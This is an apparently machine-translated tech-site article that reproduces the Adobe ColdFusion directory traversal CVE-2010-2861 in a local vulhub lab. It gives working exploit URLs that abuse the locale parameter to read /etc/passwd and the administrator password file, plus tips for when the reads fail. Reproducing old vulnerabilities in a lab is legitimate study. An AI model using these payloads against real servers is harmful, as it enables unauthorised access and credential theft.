Shulou(Shulou.com)05/31 Report--

This article mainly introduces the web security Adobe ColdFusion file reading vulnerability CVE-2010-2861 example analysis, has a certain reference value, interested friends can refer to, I hope you can learn a lot after reading this article, the following let Xiaobian take you to understand.

Adobe ColdFusion (literal translation: cold fusion) is a dynamic Web server. Its CFML (ColdFusion Markup Language) is a programming language similar to JSTL (JSP Standard Tag Lib) in JSP. It has been developed since 1995. Its design idea is considered by some people to be very advanced and used for reference by some languages.

Coldfusion is an application server platform developed by Allaire, which runs CFML (ColdFusion Markup Language) as a scripting language for Web applications. The file has the file name of * .cfm and runs in an application server environment dedicated to ColdFusion. After Allaire was acquired by Macromedia, Macromedia ColdFusion 5.0was introduced, which is similar to other application languages. The cfm file is translated into the corresponding C++ language program by the compiler, and then runs and returns the result to the browser. Although .cfc and custom tag have similar reusability, cfc provides more flexible invocation methods, such as webservice-style call support.

This paper only records and implements the vulnerability recurrence, and the utilization process is as follows:

1. Vulnerability environment

Link: http://192.168.101.152:8500/

After visiting http://192.168.101.152:8500/CFIDE/administrator/enter.cfm, it is like this.

If you use vulhub to build a vulnerability environment, you need to initialize the environment. The initial password is admin, and then wait for the initial environment to complete.

two。 Vulnerability exploitation

Replay access using burp

Http://192.168.101.152:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwden

Direct access to browsers may sometimes be unreadable because of url encoding

Read the contents of the / etc/passwd file

Visit

Http://192.168.101.152:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.propertiesen

Read the background administrator password

Sometimes you can't read it. Try to delete the cookie value.

Thank you for reading this article carefully. I hope the article "sample Analysis of Adobe ColdFusion File Reading vulnerability CVE-2010-2861 in web Security" shared by the editor will be helpful to everyone. At the same time, I also hope you will support us and pay attention to the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.